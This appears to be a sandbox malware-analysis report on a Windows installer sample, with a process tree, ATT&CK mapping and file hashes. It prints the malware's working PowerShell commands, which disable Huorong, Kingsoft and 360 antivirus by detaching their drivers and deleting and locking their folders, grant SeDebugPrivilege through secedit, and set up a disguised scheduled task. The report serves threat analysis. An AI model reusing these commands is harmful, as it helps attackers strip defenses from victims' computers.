C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðɽ¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\ProgramData\Data\un.exe"C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\3⤵
- Executes dropped EXE
PID:2784
-
-
C:\ProgramData\Program\iusb3mon.exe"C:\ProgramData\Program\iusb3mon.exe" false3⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3736 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\SysWOW64\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet5⤵
- System Location Discovery: System Language Discovery
PID:512
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3340 -
C:\Windows\SysWOW64\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet5⤵
- System Location Discovery: System Language Discovery
PID:2868
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Windows\SysWOW64\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet5⤵
- System Location Discovery: System Language Discovery
PID:4488
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\SysWOW64\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet5⤵
- System Location Discovery: System Language Discovery
PID:3840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo.>c:\inst.ini4⤵
- System Location Discovery: System Language Discovery
PID:4184
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo.>c:\inst.ini4⤵
- System Location Discovery: System Language Discovery
PID:736
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo.>c:\inst.ini4⤵
- System Location Discovery: System Language Discovery
PID:3452
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5352
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5360
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}4⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- System Location Discovery: System Language Discovery
PID:5368
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml4⤵
- System Location Discovery: System Language Discovery
PID:6140 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4464
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:3380
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5128
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}4⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- System Location Discovery: System Language Discovery
PID:5132
-
-
-
-
C:\Program Files (x86)\My Product\LineInst.exe"C:\Program Files (x86)\My Product\LineInst.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3624
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3008
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Installer Packages
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Installer Packages
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
1Ignore Process Interrupts
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
3System Binary Proxy Execution
1Msiexec
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9KB
MD5180882e0223360e1775a6d6f47e83943
SHA1aa73133b22c143c9d1a7b399df475c61aab5b083
SHA25610a568984c237891d322e0117ac2e55bb7ffb1eab5c315509e09ad767ee408af
SHA512c80ac3f9ed176f7264517fb5317113f3b2780049feb724959dea35a2ce27053b89436f222d4c81a194e4a95908eabb42de217243ca75844a10f3feb62343de8b
-
Filesize
10B
MD551c11db1054dd4650a33bf481ec27060
SHA117686b75163d8753be27e407aad97a76f311fc7b
SHA256fc835086345b170ac995c35f24546e1b7268e3d3524a125a9396a4ec8b7d3f35
SHA51294d5c2a0cb03b38657bab246a695c6528fc5f7d3ddbe716641dd59ec83a67d6ab28c083000026d10114e7ab8f8225f7c90c9fce25ef0611f46aa3899d096d80f
-
Filesize
601KB
MD54fdc31997eb40979967fc04d9a9960f3
SHA17f13bd62c13324681913304644489bb6b66f584a
SHA256e9ea78fab020718cb75a116993bfa2a5fe71c163a801995adb9e5abebc7990a2
SHA51215146e24afcfea221616ca1f049d96e8a5f9b1eccefd3a27df150e4699993889fc1ab4952f2ba1ab519b1056baaeeb4490894bc795d0cb4630f663fa08316b9a
-
Filesize
1.6MB
MD5e4a56c99aa4dd15cf1c65fff7ba44f01
SHA1533deccda72e47da9219cf34a5569aac05d7fba8
SHA2561b54aeacf41cc2f93dcb78ebfea322058e76b1b7473cf3369ef6e5be190a9a31
SHA512b4ea868fb956f254f34d1ce541d9475566b5f584bba702be0045fc4c76645767f8f8230a17550a5ada3d836d7ff05f680429c9a98945982a84d301eb26626b13
-
Filesize
3KB
MD569c282fdcd177c1ac4d6709ef841da65
SHA1575cbac132f5215c9446e6b440ca44a2082f0644
SHA256943f169c31c319417e61586d8911057321de04926e01e4cc3e6f57b3b032c28e
SHA5126b686a5d6aabe4681c6e1c83d4f32bd55d9fa26fc25ed72ecd20676c6dd3bd49cee4f1e5d1b25f2d3a90a994be00bf3b1366075272d4c3ea16917806dbbe0ea7
-
Filesize
225KB
MD5aa34b76b081bf4669f7b778973628d38
SHA1f9f975ed59deb67a9024020ed8a65ca146cdbf21
SHA25655b687c7b659314254942d0545d3ceb0a1aaaa44eb6d1bf3412423e2637d828a
SHA512159c50c4e60b487dd64c8e982d386383a2f0e5b9aee2a213b78e143e09ee657247f4ad49bf2a30ec0f6d8d8de3cb20d12dce0944baf3e6ce33e8f94f0ca13a57
-
Filesize
2.7MB
MD58f18e2aa757214f05236d018b4bf11d7
SHA135a441218070c7ba05f6cad1ac7494f10a498df7
SHA256988b6080aa7ce8c74cc5cf6910a08a310802b688e3cf9e8da75b48e29542d229
SHA51213add8ba69ee6bda18a965720c541073ba39f236bd4def095247eecdb3795c2f2203f133705d205a18c5f7a92d7921c8c9a0741c7e6eaae832cc716f30772d6c
-
Filesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
Filesize
15KB
MD5190a68725b63a5a83b62cfe384640076
SHA1158b8dbada4469f91f82e3dab92a245190fab228
SHA256e53112c9037a52d9793541fdbc29b2b0fa06f5144978d81c42f495c53d1ddee7
SHA51220ba783c84c60fd464c951d3c54d7c75e5852ce76717e674a1906e1c526721ffee345d09f41445ff3377acba630add6d9cf3dd094033823e37e7b563ff5e8e90
-
Filesize
16KB
MD5dff61f25e79a266ed4a5796f9ec0e104
SHA10e6a8421db35321abc8eab6a683539d646f28392
SHA2563413de6fbdff9483e921c3bbd6af32871a8b1f88aaf7428756212e04d440337c
SHA5124888de5585a3fa8c2f22967272fd18f744e44e1b43c5e19ef79c892d1a967935bd084809d02c1e9a9a349fbfdf3eaf795400d5d414a7588029137b56742a354b
-
Filesize
16KB
MD5ef7ec986245a9ec14084915e70559550
SHA1dc166c26265d5196cd52ae890dae126d9ea72414
SHA2567f7018daf8eb59b274c0f466d74c7ee55994a24f80d475b7a6a0cc10f41c19c7
SHA51249505a77108aec4d4f6caaa2de9e0cbd1ee12275cff96e10a9ed75bd91f563a44c568edaba3b2b314fdfb32f6bf5c303caf2c46b63b3319dd33b362f6b4fbcdc
-
Filesize
16KB
MD54813c72f043b53be941ce083b17b97bb
SHA198afa0ac039d83b76f88c9791384b71b51c95a38
SHA25608231ee3364578c49a8a35fe18c4e9aa3579d1bec84cb4e84a13ed174c1b7875
SHA512407ef2e2058588944a2844e388c708a2cb8b6f6fc11749f7317dfb1f8ffd5a763b20009539157cdb8c64188d20a9d4f7fb9f29c9e29870c8bbb8ebff92e2611f
-
Filesize
16KB
MD5c14c341b4352c34d7fb10de350edf076
SHA1a17e9eb88d058a1c2ea72a4d75d9afa263f1984c
SHA256cf6e88902eff4932ccf53f935aa24c2800fae5cdb93189e1e797750ddbaa195c
SHA512d29f46304c36403411224e662a909d98d66a93453f8252d2a8d03078136c46a4f9e07e754b819e30514b74a0a8d728abfa388a9d1035c8c0926bff16506c3c6b
-
Filesize
15KB
MD5ee4d73894cc7c22b24a0f113efbc5ebc
SHA1cc8c0f42f32e4677c84ff12393de5bad838780ab
SHA256d241c1b77b8b467499ad1a4abcea8b78f142c2f759a5f96a2c939f9b6977fb4e
SHA5127dc88dcab6c2c42bffeb5f0f4a9eec760a3a915fe14f1e8898dd591c2a69883c8f8e47eb727ddb9f99fe2fda90550e414036a6b480b84fc843a2ff39fa7f4de5
-
Filesize
16KB
MD5747208601ecf1d7bcbe5ac2f392d978c
SHA15320c54575ecb2b754d4c998ee5001650df2d42b
SHA2563625eb3f3fef50a5938cf0c00777318f6ccd7748c7b95250ec625cce45083e6f
SHA512111071a9ca11cf5c05a2392d42e3cfc4d0c016f839f7aebc63628b77cd285d55d454cbdbcce875fe6f4810bfb8d7f33d76647a74764327bb996876ff4e8d36d9
-
Filesize
16KB
MD5197171e3ad3370218c5da9c6523f9ece
SHA14b9081de02bd7467ab443a426928b8c8172f9698
SHA2560255b1090f9a1ad27015967495b6f559049b3be9ae397349375f0c5b79b0649d
SHA5122c8e71a296c6f1f093a6125616d33390949ad0bd4e9b0ee69867e906268e7a67f92efc9286fdf09bb428a76261d48822a0266865d7164fda72c60add59c926dc
-
Filesize
16KB
MD58aaf1ad002b7cd6b8ea75f210e372eea
SHA18984474a1d69d0288b8aaa808c6e97ebfbcfdd3b
SHA2569b5c4f587cd878f2dd1370d5b28ee5d257ce8eac5cf9646ca8759bbe0d09788b
SHA51261e5a20d45ff1637e3bad2c6738fa0f8d89af253633ed160940ae44524517aa8dcf908f43546bcc9530df25b4fa0e019f8f576c0877259ad642af39f2833f705
-
Filesize
15KB
MD5227ddf4e4c8dd3816ff0d5b691b5e5f3
SHA1383b609d34edd2cecfee53a0e29ff73c58010ff7
SHA2561d0c3e1dc1da5d96d049b9dead4177ab89729fb1794ddf42cd2f15543ab6ac6f
SHA51229fde00bb5ac36d656fba06d999de7cbf6dbdc86b3480d2ed0b95cce1f1229c6c060142c11f8dda2579ebfc935cb1f8c0f507a815b3fba3f31c88e8862df6850
-
Filesize
15KB
MD513e3d1e39bc5185741e64efd848a729b
SHA1c283e88494d83eb6887684122709560e485c378a
SHA25645c62ee4c7d0a07f860c0a5316041b70feddca75537163cb6e56ee5aa374eeee
SHA51254518fa4ec4dfb0ce66e493c814c82a59813933fb18be13e4239e7c2d13ca1af4723814058533e9647ba9b1124bdb142461908f4bc8251cd7cbfe73b4d61edb8
-
Filesize
2KB
MD584d68259f9ef9eed8a0506d0e3ee64c5
SHA13f794f6c237fd19b2a89bd3356d94f92f47d4e0c
SHA2561c0c719476ce20f1c0e18654df032fac81baf82d62c5e314e15f9e5ff26a0f20
SHA512b1aaa468ea0297e8d4ced88765e4c064db7986880537cd8f90b85872720234b78f7e1fb853460e5fd10175fc60570c2885b4a4e5143fd790e1a9d651f1bbac51
-
Filesize
1KB
MD574ed4a19ed3bc814d8e597bd31e5391c
SHA1e21f7a746e59eb1587410bd3119813762b02bb28
SHA2561e40da53f10bc96af2f8c2c1cd6b588384e15faac13c798ee498ea327a062e8a
SHA512110d3ffa2b19c6b5a01cf9bd5e9f93de7d506bae0a9606877cf8d6d4adf7d882fb349e15524a6834cde81dfcd30b8b4c46aca0597d073bf6aa4c056b4ba0add4
-
Filesize
2KB
MD5c6f29cf6f15bc123d0ac663038ccf886
SHA1ad32e0b495d9d8e55265a3d5b0d6aad1f2123563
SHA256467ef56719b3c527d861fb7874b121c8042500e86a15e04bbcef9b20834b6884
SHA512c455195328246088393590197a08b19e530823510fe76247c786b96eb1ca32160969527b4eef571acef01b54d6406b04fe0cfb5a98b32290fe9fdd5c67ff23cc
-
Filesize
2KB
MD5e56fb06f9a607aa6c8152a4fc8e96706
SHA1bc38d07f503c3c49fe6e84a8022d53ac93082446
SHA256dbd0fd8d055836f959b37fdace40b39eee306817c41da62e9fd34fa2d5196a12
